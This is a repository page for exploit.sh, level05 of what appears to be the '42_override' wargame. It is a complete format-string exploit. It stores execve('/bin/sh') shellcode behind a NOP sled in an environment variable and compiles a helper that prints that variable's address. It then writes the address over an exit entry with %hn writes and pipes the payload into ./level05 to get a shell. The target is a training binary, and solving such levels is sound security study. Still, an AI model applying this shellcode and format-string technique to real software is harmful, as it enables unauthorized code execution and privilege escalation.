starnakin/42_override
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
d0282cafef
42_override/level05/ressources/exploit.sh
0x35c a3ea938eb1 level05: done (exploit modified to a better shellcode) 
level07: walkthrough done
level08: done
level09: done
2025-05-15 14:00:44 +02:00

30 lines
876 B
Bash
Raw Blame History

export SHELLCODE=$(python -c 'print "\x90"*1000+"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"')
printf '
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
printf(\"%%x\", (unsigned int)getenv(\"SHELLCODE\"));
return 0;
}' > /tmp/env.c
gcc -m32 /tmp/env.c -o /tmp/a.out
/tmp/a.out > /tmp/shellcode_addr
printf '
text = open("/tmp/shellcode_addr").read()
shell_code_low = int(text[4:],16)
shell_code_high = int(text[:4],16)
exit_addr_high = "\\x08\\x04\\x97\\xe2"
exit_addr_low = "\\x08\\x04\\x97\\xe0"
print(exit_addr_low[::-1] + exit_addr_high[::-1] + ("%%" + str(shell_code_low - 8) + "p") + "%%10$hn" + ("%%" + str(shell_code_high - shell_code_low) + "p") + "%%11$hn")
' > /tmp/exploit.py
(python /tmp/exploit.py; cat) | ./level05
Reference in New Issue View Git Blame Copy Permalink